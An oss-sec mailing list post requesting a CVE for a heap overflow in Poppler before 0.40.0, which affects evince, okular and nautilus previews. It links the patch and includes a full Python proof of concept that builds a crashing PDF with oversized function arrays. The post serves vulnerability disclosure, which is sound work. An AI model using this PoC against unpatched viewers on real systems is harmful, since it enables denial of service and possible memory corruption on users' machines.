oss-sec mailing list archives
CVE request: Poppler < 0.40.0
From: Felipe <felipe.andres.manzano () gmail com>
Date: Mon, 11 Apr 2016 20:52:27 -0300
This is a clean heap overflow. Lib is used in evince and okular and for preview in nautilus. Versions pre 0.40.0 are vulnerable. The patch: https://cgit.freedesktop.org/poppler/poppler/commit/?id=b3425dd3261679958cd56c0f71995c15d2124433 A crashy pdf file is attached. PoC.py from miniPDF.miniPDF import * #from miniPDF.miniPDFO import * import zlib #The document doc = PDFDoc() #font font = PDFDict() font.add("Name", PDFName("F1")) font.add("Subtype", PDFName("Type1")) font.add("BaseFont", PDFName("Helvetica")) #name:font map fontname = PDFDict() fontname.add("F1",font) #resources resources = PDFDict() resources.add("Font",fontname) data = '''BT /F1 24 Tf 240 700 Td (Pedefe Pedefeito endstream endobj obj 1 0 99 endobj Pedefeon!) Tj ET /GS3 gs''' #contents contentsDict = PDFDict() contents= PDFStream({},data) length = PDFNum(len(data)) doc.add(length) contents.add('Length',PDFRef(length)) #page page = PDFDict() page.add("Type",PDFName("Page")) page.add("Resources",resources) page.add("Contents", PDFRef(contents)) #pages pages = PDFDict() pages.add("Type", PDFName("Pages")) pages.add("Kids", PDFArray([PDFRef(page)])) pages.add("Count", PDFNum(1)) #add parent reference in page page.add("Parent",PDFRef(pages)) #catalog catalog = PDFDict() catalog.add("Type", PDFName("Catalog")) catalog.add("Pages", PDFRef(pages)) doc.add([catalog,pages,page,contents]) doc.setRoot(catalog) #The Function thing function = PDFDict() function.add("FunctionType",PDFNum(2)) function.add("Domain",PDFArray([0,1])) function.add("N",PDFNum(100)) #2261634.5098039214 size = 10000000 function.add("C0",PDFArray([2261634.5098039214]*size)) function.add("C1",PDFArray([2261634.5098039214]*size)) extgstate = PDFDict() extgstate.add("Type",PDFName("ExtGState")) extgstate.add("TR",function) resources.add("ExtGState","<< /GS3 "+str(extgstate)+">>") print doc
Attachment:
crash.pdf.gz
Description:
Current thread:
- CVE request: Poppler < 0.40.0 Felipe (Apr 11)
- Re: CVE request: Poppler < 0.40.0 cve-assign (Apr 23)